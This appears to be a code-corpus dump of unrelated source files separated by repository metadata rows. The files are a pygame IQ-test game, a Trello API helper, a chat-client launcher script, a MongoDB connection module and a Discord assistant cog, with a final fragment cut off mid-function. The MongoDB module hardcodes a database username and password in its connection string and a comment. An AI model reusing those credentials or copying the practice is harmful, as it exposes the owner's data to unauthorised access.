# NOTE(review): playtime is never used elsewhere in the file.
playtime = 0.0
# NOTE(review): ticks is sampled exactly once at startup rather than per frame;
# the per-loop timer decrement (ticks/1860.0) therefore uses this single
# initial value — confirm that is intended.
ticks = clock.tick(FPS)
#Opens file using name and mode
def open_file(name, mode):
    '''Open *name* in *mode*; on failure, tell the user and exit the program.'''
    #Tries to open file
    try:
        iq_file = open(name, mode)
    #Will print this out if IOError is recieved
    except IOError as e:
        print("The file {0} does not exist.\n{1}".format(name,e))
        input("\n\nPress enter to exit the program. ")
        #BUG FIX: sys was never imported at module level, so this line used to
        #raise NameError instead of exiting cleanly (sys is now imported).
        sys.exit()
    else:
        #Returns the opened file object
        return iq_file
#reads next line of the file
def next_line(iq_file):
    '''Return the next line of the already-open file object (empty at EOF).'''
    return iq_file.readline()
def text_objects(text, font):
    '''Render *text* with *font* in the module-level black colour.

    Returns a (surface, rect) pair; callers centre the rect before blitting.
    '''
    #Creates surface with rendered text (antialiased, module-global black)
    textSurface = font.render(text, True, black)
    #Returns surface and rectangle of surface
    return textSurface, textSurface.get_rect()
#Display Text
def display_text(text, width, height, size):
    '''Blit *text* onto the global screen, centred at (width, height).

    NOTE(review): despite their names, *width* and *height* here are the
    centre coordinates of the text, not dimensions; they shadow the module
    globals of the same names.
    '''
    #Loads the Futura font at the requested point size (reloaded every call)
    size_text = pygame.font.Font("futura.ttf", size)
    #Gets text surface and and rectangle
    TextSurf, TextRect = text_objects(text, size_text)
    #Centers the rectangle at the given point
    TextRect.center = ((width),(height))
    #Blits text surface and rectangle
    screen.blit(TextSurf, TextRect)
#Button
def button(x, y, width, height, text, text_width, text_height, text_size, button):
    '''Draw a clickable button and dispatch its action when clicked.

    *button* selects the action: "s" start quiz, "m" menu, "hs" high scores,
    "c" correct answer (+10 score), "w" wrong answer, "pa"/"pl" pause/resume
    music, "q" quit.

    NOTE(review): actions call quiz()/menu()/high_scores() directly from
    here, so every click deepens the call stack instead of returning control
    to a single main loop — confirm this is acceptable for session length.
    '''
    #Gets mouse position
    mouse_pos = pygame.mouse.get_pos()
    #Gets whether mouse button has been pressed
    click = pygame.mouse.get_pressed()
    #Draws rectangle for button
    pygame.draw.rect(screen, black, [x, y, width, height], 2)
    #Displays text within button
    display_text(text, text_width, text_height, text_size)
    #Checks if mouse position is within boundaries of button
    if x+width > mouse_pos[0] > x and y+height > mouse_pos[1] > y:
        #Draws the box in aqua blue (hover highlight)
        pygame.draw.rect(screen, aqua_blue, [x, y, width, height], 2)
        #If left clicked
        if click[0] == 1:
            #Checks what destination button desires
            #if start
            if button == "s":
                #Resets time
                global time_left
                time_left = 201.0
                #Slight delay so button on next screen isn't accidentally clicked
                time.sleep(0.2)
                #Starts quiz function
                quiz()
            #If menu
            elif button == "m":
                #Delay
                time.sleep(0.2)
                #Starts menu function
                menu()
            #If high scores
            elif button == "hs":
                #Delay
                time.sleep(0.2)
                #Starts high scores function
                high_scores()
            #If correct
            elif button == "c":
                #adds 10 to overall score
                global overall_score
                overall_score = overall_score + 10
                #Delay
                time.sleep(0.2)
                #Starts quiz function
                quiz()
            #If wrong
            elif button == "w":
                #Delay
                time.sleep(0.2)
                #Starts quiz function
                quiz()
            #Pauses music and gets position stopped at
            elif button == "pa":
                pygame.mixer.music.pause()
                global song_time
                song_time = song_time + pygame.mixer.music.get_pos()
            #Plays music from stopped position
            elif button == "pl":
                pygame.mixer.music.play(-1, song_time)
            #If quit
            elif button == "q":
                #Quits pygame then closes window
                pygame.quit()
                quit()
#Maths question
def maths_question():
    '''Generate one random arithmetic question and run its answer screen.

    NOTE(review): "/" uses Python 3 true division, so the correct answer may
    be a long float — confirm intended. If the true answer happens to appear
    in wrong_list, the loop below marks ALL four buttons as correct — confirm
    intended. Unlike text_question, this loop never calls time_out() when
    time_left reaches 0 — confirm intended.
    '''
    #Makes list of operators
    operators = ["*", "/", "+", "-"]
    #Chooses random operator
    operator = random.choice(operators)
    #Generates random numbers for questions
    num1 = random.randint(0, 100)
    num2 = random.randint(0, 100)
    num3 = random.randint(1, 20)
    num4 = random.randint(1, 20)
    #Chooses number to be used as the correct choice
    correct_choice = random.randint(0, 3)
    #Creates a list of random numbers to be used as wrong answers
    wrong_list = []
    for x in range(4):
        wrong = random.randint(0, 200)
        wrong_list.append(wrong)
    #Boolean value for while loop
    math = True
    while math:
        #Makes time left a float and takes away ticks/1860
        global time_left
        time_left = float(time_left)
        time_left = time_left - ticks/1860.0
        #String slice to get rid of decimals except for last 10 seconds
        if 10 <= time_left < 100:
            display_time = (str(time_left))[0:2]
        else:
            display_time = (str(time_left))[0:3]
        for event in pygame.event.get():
            #Quits game if "X" is clicked
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        #Fills screen white
        screen.fill(white)
        #Buttons to pause/play music
        button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
        button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
        #Draws black box on screen in left corner for timer
        pygame.draw.rect(screen, black, [(width/10)-50, (height/10)-15, 100, 30], 2)
        #Displays time left in box
        display_text(display_time, (width/10), (height/10), 30)
        #If branch determining question to display depending on the operator chosen
        if operator == "*":
            #Formats question in a string
            question = "What is the result of {0} X {1}?".format(num3,num4)
            #Displays question at top of window
            display_text(question, (width/2), (height/6), 50)
            #Works out correct answer
            correct = num3*num4
        elif operator == "/":
            question = "What is the result of {0} / {1}?".format(num3,num4)
            display_text(question, (width/2), (height/6), 50)
            correct = num3/num4
        elif operator == "+":
            question = "What is the result of {0} + {1}?".format(num1,num2)
            display_text(question, (width/2), (height/6), 50)
            correct = num1+num2
        else:
            question = "What is the result of {0} - {1}?".format(num1,num2)
            display_text(question, (width/2), (height/6), 50)
            correct = num1-num2
        #for each loop creates a button
        for i in range(4):
            #Creates the correct button at correct_choice position and ensures button is correct if wrong answers generate correct answer
            if i == correct_choice or correct in wrong_list:
                answer = "{0}) {1}".format(i+1, correct)
                button((width/2)-150, (height/3)-25+i*100, 300, 50, answer, (width/2), (height/3)+i*100, 30, "c")
            #Creates wrong button at other positions
            else:
                answer = "{0}) {1}".format(i+1, wrong_list[i])
                button((width/2)-150, (height/3)-25+i*100, 300, 50, answer, (width/2), (height/3)+i*100, 30, "w")
        #updates display every loop
        pygame.display.update()
#Text question
def text_question(iq_file):
    '''Ask one multiple-choice question read from *iq_file*.

    The file is laid out as repeating 7-line records: question, 4 answers,
    the correct answer number, and a points value. A random unused record is
    selected per call; used_questions tracks indices already shown.

    NOTE(review): the reset below triggers on num_ques values 11/16/21/26/31,
    i.e. at the start of each new 5-question category — confirm the offsets
    line up with quiz()'s counters. The *points* value read from the file is
    never used — confirm scoring is meant to be a flat +10 in button().
    '''
    #Resets used questions for every new section out of text sections
    if num_ques == 11 or num_ques == 16 or num_ques == 21 or num_ques == 26 or num_ques == 31:
        global used_questions
        used_questions = []
    #chooses random number for question
    rand_num = random.randint(0,9)
    #Will choose a new number if number already used
    while rand_num in used_questions:
        rand_num = random.randint(0,9)
    #Appends number to used
    used_questions.append(rand_num)
    #Ensures loop starts
    ques_num = -1
    #Read records sequentially until the chosen one is reached.
    while ques_num != rand_num:
        #Reads question from file and puts in variable
        question = next_line(iq_file)
        #Gets rid of newline char
        if question:
            question = question[:-1]
        #Puts the 4 answers in a list
        answers = []
        for i in range(4):
            answer = next_line(iq_file)
            #Gets rid of newline char
            if answer:
                answer = answer[:-1]
            #Puts answers in a list
            answers.append(answer)
        #Reads correct answer puts in a variable
        correct = next_line(iq_file)
        #Gets rid of newline char
        if correct:
            correct = correct[0]
            correct = int(correct)
        #Reads points from file and puts in variable
        points = next_line(iq_file)
        #Converts to int
        if points:
            points = int(points)
        #Adds one to ques_num
        ques_num += 1
    #Resets file back to first line
    iq_file.seek(0)
    #Prints question and answers
    #Sets up True value for loop
    text = True
    while text:
        global time_left
        time_left = float(time_left)
        #Makes time left a float and takes away ticks/1860
        time_left = time_left - ticks/1860.0
        #String slicing to get rid of decimals except for last 10 seconds
        if 10 <= time_left < 100:
            display_time = (str(time_left))[0:2]
        else:
            display_time = (str(time_left))[0:3]
        #Will call time out function if time_left is less than or equal to 0
        if time_left <= 0:
            time_out()
        for event in pygame.event.get():
            #Will quit if "X" is pressed
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        #Fills screen with white
        screen.fill(white)
        #Buttons to pause/play music
        button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
        button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
        #Draws rectangle for timer
        pygame.draw.rect(screen, black, [(width/10)-50, (height/10)-15, 100, 30], 2)
        #Displays timer in box
        display_text(display_time, (width/10), (height/10), 30)
        #Displays question at top of window size 50 text
        display_text(question, (width/2), (height/6), 50)
        #Loops 4 times
        for y in range(len(answers)):
            #Puts answer from list in string
            answer = "{0}) {1}".format(y+1, answers[y])
            #If loops to correct answer of question then button created with correct answer
            if (y+1) == correct:
                button((width/2)-150, (height/3)-25+y*100, 300, 50, answer, (width/2), (height/3)+y*100, 30, "c")
            #Else wrong button created with wrong answers
            else:
                button((width/2)-150, (height/3)-25+y*100, 300, 50, answer, (width/2), (height/3)+y*100, 30, "w")
        #Updates display
        pygame.display.update()
#Out of time function
def time_out():
    '''Show the "out of time" screen until the user clicks Menu or quits.

    NOTE(review): the local name `time` shadows the imported time module
    inside this function; harmless here since time.sleep is not called in
    this scope, but worth renaming eventually.
    '''
    #Sets boolean value to true for loop
    time = True
    while time:
        for event in pygame.event.get():
            #Quits game if "X" pressed
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        #Screen filled with white
        screen.fill(white)
        #Puts message in string
        message = "You ran out of time"
        #Displays message at top of window size 100
        display_text(message, (width/2), (height/5), 100)
        #Creates menu button allows you to go back to menu and restart
        button((width/2)-100, (height/2)-25, 200, 50, "Menu", (width/2), (height/2), 30, "m")
        #Updates display
        pygame.display.update()
#User name function
def user_name():
    '''Prompt the player to type their name; return it on Enter.

    Only alphabetic characters are accepted; Backspace deletes; an empty
    submission shows an error instead of returning. Key constants (KEYDOWN,
    K_BACKSPACE, K_RETURN) come from the pygame.locals star import.
    '''
    #Creates empty string
    string = ""
    #Question to be used put in string
    name_ques = "What is your name?"
    error = "You need to enter a name."
    #Error false
    is_error = False
    user_input = True
    while user_input:
        for event in pygame.event.get():
            #Quits if "X" is pressed
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
            #Checks if key has been pressed
            elif event.type == KEYDOWN:
                #Checks if key unicode was a letter
                if event.unicode.isalpha():
                    #Adds letter to string
                    string += event.unicode
                #Checks if key was a backspace
                elif event.key == K_BACKSPACE:
                    #Takes last letter from string
                    string = string[:-1]
                #Checks if enter key is pressed
                elif event.key == K_RETURN:
                    #Checks if string is still empty when enter key pressed
                    if string == "":
                        #Error true
                        is_error = True
                    else:
                        #Else return string
                        return string
        #Screen filled white
        screen.fill(white)
        #If error true displays error message
        if is_error:
            display_text(error, (width/2), ((3*height)/4), 60)
        #Displays question asking user to enter name
        display_text(name_ques, (width/2), (height/4), 75)
        #Displays name as its being typed
        display_text(string, (width/2), (height/2), 50)
        #Updates display
        pygame.display.update()
#Updates high scores
def update_high_scores(iq, time):
    '''Ask for the player's name and append [name, iq, time] to the scores file.

    NOTE(review): the parameter `time` shadows the imported time module
    within this function — harmless here, but worth renaming eventually.
    '''
    #Calls user name function and returns name (blocks until Enter is pressed)
    name = user_name()
    #Creates list with name, iq and time taken
    high_score = [name, iq, time]
    #High scores file opened for appending to
    high_file = open_file("high_scores.dat", "ab")
    #list pickled to file (one pickle per score; read back with repeated load)
    pickle.dump(high_score, high_file)
    #file closed
    high_file.close()
    #Returns name
    return name
#High scores function
def high_scores():
    '''Load all pickled scores, sort them, and show the top-10 screen.

    NOTE(review): the local list `high_scores` shadows this function's own
    name inside the body — harmless (the function never recurses), but
    confusing to readers.
    '''
    #Creates empty list for high scores
    high_scores = []
    #Opens file for reading
    high_file = open_file("high_scores.dat", "rb")
    #Each dump() wrote one pickle; load repeatedly until EOFError
    try:
        while True:
            #reads line
            high_line = pickle.load(high_file)
            #Appends line to list
            high_scores.append(high_line)
    except EOFError:
        pass
    #Closes file
    high_file.close()
    #Sorts list first in decreasing order of score then increasing order of time
    high_scores.sort(key=lambda x: (int(-(x[1])),x[2]))
    #Message in string
    score_message = "The top 10 high scores are:"
    high_score = True
    while high_score:
        for event in pygame.event.get():
            #Quits game if "X" pressed
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        #Screened filled white
        screen.fill(white)
        #Buttons to pause/play music
        button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
        button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
        #Displays message
        display_text(score_message, (width/2), (height/8), 50)
        #If list longer or equal to 10 scores then only first 10 displayed
        if len(high_scores) >= 10:
            for i in range(10):
                score = "{0}. {1} - {2} - {3} seconds".format(i+1, high_scores[i][0], high_scores[i][1], high_scores[i][2])
                display_text(score, (width/2), (height/4)+i*35, 30)
        #If less than ten but still 1 or more then only that amount is displayed
        elif 1 <= len(high_scores) < 10:
            for i in range(len(high_scores)):
                score = "{0}. {1} - {2} - {3} seconds".format(i+1, high_scores[i][0], high_scores[i][1], high_scores[i][2])
                display_text(score, (width/2), (height/4)+i*35, 30)
        #Otherwise "None" is displayed
        else:
            display_text("None", (width/2), (height/4), 30)
        #Creates back and quit buttons
        button((width/4)-100, (height/2)-25, 200, 50, "Back", (width/4), (height/2), 30, "m")
        button(((3*width)/4)-100, (height/2)-25, 200, 50, "Quit", ((3*width)/4), (height/2), 30, "q")
        #Updates display
        pygame.display.update()
#quiz
def quiz():
    '''Main function controlling quiz.

    Dispatches to the next question based on num_ques: questions 1-5 are
    maths, then five 5-question text categories; after 30 questions it shows
    the results screen. Each branch is entered via recursive calls from
    button(), so num_ques acts as the cross-call progress counter.
    '''
    #Declare as global variable
    global num_ques
    #First 5 questions are maths based
    if num_ques < 5:
        #Adding one to number of questions
        num_ques = num_ques + 1
        #Displays maths question with answers
        maths_question()
    #Rest are text based with different sections 5 questions long
    elif 5 <= num_ques < 10:
        #General knowledge questions
        iq_file = open_file("general knowledge.txt", "r")
        num_ques = num_ques + 1
        #Display a text question with answers
        text_question(iq_file)
    elif 10 <= num_ques < 15:
        #Music questions
        iq_file = open_file("music.txt", "r")
        num_ques = num_ques + 1
        text_question(iq_file)
    elif 15 <= num_ques < 20:
        #Movie questions
        iq_file = open_file("movies.txt", "r")
        num_ques = num_ques + 1
        text_question(iq_file)
    elif 20 <= num_ques < 25:
        #Geography questions
        iq_file = open_file("geography.txt", "r")
        num_ques = num_ques + 1
        text_question(iq_file)
    elif 25 <= num_ques < 30:
        #Language questions
        iq_file = open_file("language.txt", "r")
        num_ques = num_ques + 1
        text_question(iq_file)
    #Else the quiz has finished
    else:
        #Converts score to IQ (max raw score 300 -> max IQ 200)
        global overall_score
        iq = int(overall_score*(2/3))
        #Resets score for next time
        overall_score = 0
        #Works out time taken to complete test (started at 200 seconds)
        global time_left
        time_left = int(time_left)
        time = 200-time_left
        #Adds name, score and time to file and returns name
        name = update_high_scores(iq, time)
        #Resets number of questions
        num_ques = 0
        # NOTE(review): local `quiz` shadows this function's own name below.
        quiz = True
        while quiz:
            for event in pygame.event.get():
                #Quits if "X" is pressed
                if event.type == pygame.QUIT:
                    pygame.quit()
                    quit()
            #Screen filled with white
            screen.fill(white)
            #Buttons to pause/play music
            button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
            button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
            #Score, time and play again message to inform user of their achievements
            score_message = "Congratulations {0}! You got an IQ of {1}!".format(name,iq)
            time_message = "And did it in a time of {0} seconds!".format(time)
            play_again = "What would you like to do?"
            #Displays score, time and play again messages
            display_text(score_message, (width/2), (height/6), 50)
            display_text(time_message, (width/2), (height/6)+75, 50)
            display_text(play_again, (width/2), (height/3)+100, 40)
            #Displays buttons to retake test, go to main menu and quit
            button((width/4)-100, ((2*height)/3)-25, 200, 50, "Retake Test", (width/4), ((2*height)/3), 30, "s")
            button((width/2)-100, ((2*height)/3)-25, 200, 50, "Main Menu", (width/2), ((2*height)/3), 30, "m")
            button(((3*width)/4)-100, ((2*height)/3)-25, 200, 50, "Quit", ((3*width)/4), ((2*height)/3), 30, "q")
            #Updates display
            pygame.display.update()
#menu
def menu():
    '''Main-menu screen offering Start, High Scores and Quit.

    NOTE(review): the local flag `menu` shadows this function's own name —
    harmless here since navigation happens via button() callbacks.
    '''
    menu = True
    while menu:
        for event in pygame.event.get():
            #Quits if "X" pressed
            if event.type == pygame.QUIT:
                pygame.quit()
                quit()
        #Screen filled white
        screen.fill(white)
        #Displays title for menu
        display_text("IQ Test", (width/2), (height/6), 100)
        #Buttons for pause/play music
        button(((9*width)/10)-200, ((9*height)/10)-25, 100, 50, "Pause", ((9*width)/10)-150, ((9*height)/10), 30, "pa")
        button(((9*width)/10)-50, ((9*height)/10)-25, 100, 50, "Play", ((9*width)/10), ((9*height)/10), 30, "pl")
        #Buttons for Start, High Scores and Quit
        button((width/2)-100, height/3, 200, 50, "Start", (width/2), (height/3)+25, 30, "s")
        button((width/2)-100, (height/3)+100, 200, 50, "High Scores", (width/2), (height/3)+125, 30, "hs")
        button((width/2)-100, (height/3)+200, 200, 50, "Quit", (width/2), (height/3)+225, 30, "q")
        #Updates display
        pygame.display.update()
#Start program at the main menu
menu()
| SadRavioli/Portfolio | Python/Python Project 1st Year/IQ Test.py | IQ Test.py | py | 22,848 | python | en | code | 0 | github-code | 13 |
33141206324 | """Trello lists services."""
# Python Libraries
import requests
# Services
from spacex_api.utils.services.trello.base import get_needed_data, perform_request
def get_lists(user=None, board_id=None):
    """Get lists
    ---
    Return all lists on the given Trello board, trimmed by get_needed_data.
    """
    url = f"https://api.trello.com/1/boards/{board_id}/lists"
    response = perform_request(
        method="GET",
        url=url,
        user=user
    )
    print(f"Get lists status: {response.status_code}")
    # Normalise each raw Trello list payload down to the fields we care about.
    board_lists = [get_needed_data(raw_list) for raw_list in response.json()]
    return board_lists
27918555273 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
if __name__ == "__main__":
num = 10
if (len(sys.argv) > 1):
num = int(sys.argv[1])
print(num)
for i in range(1, num):
os.system("./chatClient/chatClient/client.o " + str(i) + "熊") | leonlyo/ManyPeopleChat | createClient.py | createClient.py | py | 264 | python | en | code | 0 | github-code | 13 |
5034773602 | from pymongo import MongoClient
import certifi
from uuid import uuid4
def get_connection():
    """Return a MongoClient connected to the Atlas cluster over TLS.

    SECURITY(review): the username and password are hardcoded in the URI (and
    repeated in the comment below). They should be moved to an environment
    variable or secrets store and the exposed credential rotated.
    """
    # certifi supplies the CA bundle required for Atlas TLS verification.
    ca = certifi.where()
    # password : ias-iot-avishkar-23
    client = MongoClient("mongodb+srv://hkashyap0809:ias-iot-avishkar-23@sensor-cluster.jzrhdzp.mongodb.net/?retryWrites=true&w=majority",tlsCAFile=ca)
    return client
def create_schema(db, sensor_type):
    """Create the *sensor_type* collection with a JSON-Schema validator and indexes.

    The validator requires nodename / sensor_data / timestamp /
    occupancy_state (all strings); `id` gets a unique index, and nodename
    and timestamp get plain indexes for lookups.
    """
    schema = {
        '$jsonSchema': {
            'bsonType': 'object',
            'required': ['nodename', 'sensor_data', 'timestamp', 'occupancy_state'],
            'properties': {
                'id': {
                    'bsonType': 'string',
                    'description': 'must be a string and is required'
                },
                'nodename': {
                    'bsonType': 'string',
                    'description': 'must be a string and is required'
                },
                'sensor_data': {
                    'bsonType': 'string',
                    'description': 'must be a string and is required'
                },
                'timestamp': {
                    'bsonType': 'string',
                    'description': 'must be a string and is required'
                },
                'occupancy_state': {
                    'bsonType': 'string',
                    'description': 'must be a string and is required'
                }
            }
        }
    }
    # BUG FIX: the schema dict was previously passed to create_index(), which
    # expects an index specification, not a validator. A JSON-Schema validator
    # must be supplied when the collection is created.
    collection = db.create_collection(sensor_type, validator=schema)
    collection.create_index([('id', 1)], unique=True)
    collection.create_index([('nodename', 1)])
    collection.create_index([('timestamp', 1)])
# Set up a connection to MongoDB Atlas
# Connect to a database in MongoDB Atlas
client = get_connection()
db_name = 'sensor-database'
db = client[db_name]
# One-off setup / smoke-test snippets kept for reference.
# NOTE(review): the sample docs below use integer sensor_data values, but the
# schema above requires strings — they would fail validation if re-enabled.
# create_schema(db,'temperature')
# collection = db['temperature']
# doc = [{"id": str(uuid4()), "nodename": "h105", "sensor_data": 234,"timestamp":"3453","occupancy_state":"0"},
#     {"id": str(uuid4()), "nodename": "h205", "sensor_data": 4,"timestamp":"345345","occupancy_state":"0"},
#     {"id": str(uuid4()), "nodename": "obh", "sensor_data": 756,"timestamp":"345345","occupancy_state":"0"},]
# collection.insert_many(doc)
17938668726 | import asyncio
import logging
from io import BytesIO
import discord
from redbot.core import commands
from redbot.core.i18n import Translator, cog_i18n
from redbot.core.utils.chat_formatting import box, escape, pagify
from ..abc import MixinMeta
from ..common.calls import request_model
from ..common.constants import READ_EXTENSIONS
from ..common.utils import can_use
log = logging.getLogger("red.vrt.assistant.base")
_ = Translator("Assistant", __file__)
@cog_i18n(_)
class Base(MixinMeta):
@commands.command(name="chathelp")
async def chat_help(self, ctx: commands.Context):
"""Get help using assistant"""
txt = (
_(
"""
# How to Use
### Commands
`[p]convostats` - view your conversation message count/token usage for that convo.
`[p]clearconvo` - reset your conversation for the current channel/thread/forum.
`[p]showconvo` - get a json dump of your current conversation (this is mostly for debugging)
`[p]chat` or `[p]ask` - command prefix for chatting with the bot outside of the live chat, or just @ it.
### Chat Arguments
`[p]chat --last` - resend the last message of the conversation.
`[p]chat --extract` - extract all markdown text to be sent as a separate message.
`[p]chat --outputfile <filename>` - sends the reply as a file instead.
### Argument Use-Cases
`[p]chat --last --outpufile test.py` - output the last message the bot sent as a file.
`[p]chat write a python script to do X... --extract --outputfile test.py` - all code blocks from the output will be sent as a file in addition to the reply.
`[p]chat --last --extract --outputfile test.py` - extract code blocks from the last message to send as a file.
### File Comprehension
Files may be uploaded with the chat command to be included with the question or query, so rather than pasting snippets, the entire file can be uploaded so that you can ask a question about it.
At the moment the bot is capable of reading the following file extensions.
```json
{}
```
If a file has no extension it will still try to read it only if it can be decoded to utf-8.
### Tips
- Replying to someone else's message while using the `[p]chat` command will include their message in *your* conversation, useful if someone says something helpful and you want to include it in your current convo with GPT.
- Replying to a message with a file attachment will have that file be read and included in your conversation. Useful if you upload a file and forget to use the chat command with it, or if someone else uploads a file you want to query the bot with.
- Conversations are *Per* user *Per* channel, so each channel you interact with GPT in is a different convo.
- Talking to the bot like a person rather than a search engine generally yields better results. The more verbose you can be, the better.
- Conversations are persistent, if you want the bot to forget the convo so far, use the `[p]clearconvo` command
"""
)
.replace("[p]", ctx.clean_prefix)
.format(", ".join(READ_EXTENSIONS))
)
embed = discord.Embed(description=txt.strip(), color=ctx.me.color)
await ctx.send(embed=embed)
    @commands.command(
        name="chat",
        aliases=[
            "ask",
            "escribir",
            "razgovor",
            "discuter",
            "plaudern",
            "채팅",
            "charlar",
            "baterpapo",
            "sohbet",
        ],
    )
    @commands.guild_only()
    @commands.cooldown(1, 6, commands.BucketType.user)
    async def ask_question(self, ctx: commands.Context, *, question: str):
        """
        Chat with [botname]!

        Conversations are *Per* user *Per* channel, meaning a conversation you have in one channel will be kept in memory separately from another conversation in a separate channel

        **Optional Arguments**
        `--outputfile <filename>` - uploads a file with the reply instead (no spaces)
        `--extract` - extracts code blocks from the reply

        **Example**
        `[p]chat write a python script that prints "Hello World!"`
        - Including `--outputfile hello.py` will output a file containing the whole response.
        - Including `--outputfile hello.py --extract` will output a file containing just the code blocks and send the rest as text.
        - Including `--extract` will send the code separately from the reply
        """
        # Per-guild configuration (API keys, model choice, blacklist, ...).
        conf = self.db.get_conf(ctx.guild)
        # Abort if no usable LLM is configured; can_call_llm informs the user itself.
        if not await self.can_call_llm(conf, ctx):
            return
        # Skip handling when the author/channel is blocked by the blacklist.
        if not await can_use(ctx.message, conf.blacklist):
            return
        # Keep the "typing..." indicator visible while the reply is generated.
        async with ctx.typing():
            await self.handle_message(ctx.message, question, conf)
    @commands.command(name="convostats")
    @commands.guild_only()
    async def show_convo_stats(self, ctx: commands.Context, *, user: discord.Member = None):
        """
        Check the token and message count of yourself or another user's conversation for this channel

        Conversations are *Per* user *Per* channel, meaning a conversation you have in one channel will be kept in memory separately from another conversation in a separate channel

        Conversations are only stored in memory until the bot restarts or the cog reloads
        """
        if not user:
            user = ctx.author
        conf = self.db.get_conf(ctx.guild)
        conversation = self.db.get_conversation(user.id, ctx.channel.id, ctx.guild.id)
        messages = len(conversation.messages)
        # NOTE(review): the limits below are derived from the *invoker*
        # (ctx.author), not the inspected user -- confirm this is intentional.
        max_tokens = self.get_max_tokens(conf, ctx.author)

        def generate_color(index: int, limit: int):
            # Returns the (green, blue) components of a white->red gradient:
            # (255, 255) at index 0 fades towards (0, 0) as index approaches limit.
            if not limit:
                return (0, 0)
            if index > limit:
                return (0, 0)
            # RGB for white is (255, 255, 255) and for red is (255, 0, 0)
            # As we progress from white to red, we need to decrease the values of green and blue from 255 to 0
            # Calculate the decrement in green and blue values
            decrement = int((255 / limit) * index)
            # Calculate the new green and blue values
            green = blue = 255 - decrement
            # Return the new RGB color
            return (green, blue)

        convo_tokens = await self.convo_token_count(conf, conversation)
        g, b = generate_color(messages, conf.get_user_max_retention(ctx.author))
        gg, bb = generate_color(convo_tokens, max_tokens)
        # Whatever limit is more severe get that color
        color = discord.Color.from_rgb(255, min(g, gg), min(b, bb))
        model = conf.get_user_model(ctx.author)
        # With no API key but an endpoint override set, ask the external
        # endpoint which model it is actually serving.
        if not conf.api_key and (conf.endpoint_override or self.db.endpoint_override):
            endpoint = conf.endpoint_override or self.db.endpoint_override
            try:
                res = await request_model(f"{endpoint}/model")
                model = res["model"]
            except Exception as e:  # Could be any issue, don't worry about it here
                log.warning(_("Could not fetch external model"), exc_info=e)
                pass
        desc = (
            ctx.channel.mention
            + "\n"
            + _("`Messages: `{}/{}\n`Tokens: `{}/{}\n`Expired: `{}\n`Model: `{}").format(
                messages,
                conf.get_user_max_retention(ctx.author),
                convo_tokens,
                max_tokens,
                conversation.is_expired(conf, ctx.author),
                model,
            )
        )
        embed = discord.Embed(
            description=desc,
            color=color,
        )
        embed.set_author(
            name=_("Conversation stats for {}").format(user.display_name),
            icon_url=user.display_avatar,
        )
        embed.set_footer(
            text=_("Token limit is a soft cap and excess is trimmed before sending to the api")
        )
        await ctx.send(embed=embed)
@commands.command(name="clearconvo")
@commands.guild_only()
async def clear_convo(self, ctx: commands.Context):
"""
Reset your conversation with the bot
This will clear all message history between you and the bot for this channel
"""
conversation = self.db.get_conversation(ctx.author.id, ctx.channel.id, ctx.guild.id)
conversation.reset()
await ctx.send(_("Your conversation in this channel has been reset!"))
    @commands.command(name="query")
    @commands.bot_has_permissions(embed_links=True)
    async def test_embedding_response(self, ctx: commands.Context, *, query: str):
        """
        Fetch related embeddings according to the current settings along with their scores

        You can use this to fine-tune the minimum relatedness for your assistant
        """
        conf = self.db.get_conf(ctx.guild)
        # Guard clauses: nothing to do without embeddings, a non-zero top_n,
        # and a callable LLM backend.
        if not conf.embeddings:
            return await ctx.send(_("You do not have any embeddings configured!"))
        if not conf.top_n:
            return await ctx.send(_("Top N is set to 0 so no embeddings will be returned"))
        if not await self.can_call_llm(conf, ctx):
            return
        async with ctx.typing():
            query_embedding = await self.request_embedding(query, conf)
            if not query_embedding:
                return await ctx.send(_("Failed to get embedding for your query"))
            # Similarity search can be CPU heavy; run it off the event loop.
            embeddings = await asyncio.to_thread(conf.get_related_embeddings, query_embedding)
            if not embeddings:
                return await ctx.send(
                    _("No embeddings could be related to this query with the current settings")
                )
            # One embed per page of each related entry, annotated with its score.
            for name, em, score, dimension in embeddings:
                for p in pagify(em, page_length=4000):
                    txt = (
                        _("`Entry Name: `{}\n").format(name)
                        + _("`Relatedness: `{}\n").format(round(score, 4))
                        + _("`Dimensions: `{}\n").format(dimension)
                    )
                    escaped = escape(p)
                    boxed = box(escaped)
                    txt += boxed
                    embed = discord.Embed(description=txt)
                    await ctx.send(embed=embed)
@commands.command(name="showconvo")
@commands.guild_only()
@commands.guildowner()
async def show_convo(self, ctx: commands.Context, *, user: discord.Member = None):
"""
View the current transcript of a conversation
This is mainly here for moderation purposes
"""
if not user:
user = ctx.author
conversation = self.db.get_conversation(user.id, ctx.channel.id, ctx.guild.id)
if not conversation.messages:
return await ctx.send(_("You have no conversation in this channel!"))
text = ""
for message in conversation.messages:
role = message["role"]
content = message["content"]
text += f"{role}: {content}\n"
buffer = BytesIO(text.encode())
buffer.name = f"{ctx.author.name}_transcript.txt"
buffer.seek(0)
file = discord.File(buffer)
await ctx.send(_("Here is your conversation transcript!"), file=file)
| vertyco/vrt-cogs | assistant/commands/base.py | base.py | py | 11,142 | python | en | code | 33 | github-code | 13 |
34785484858 | from rct229.rulesets.ashrae9012019.data.schema_enums import schema_enums
from rct229.utils.jsonpath_utils import find_one
from rct229.utils.utility_functions import find_exactly_one_hvac_system
HEATING_SYSTEM = schema_enums["HeatingSystemOptions"]
def is_hvac_sys_preheating_type_fluid_loop(rmi_b, hvac_b_id):
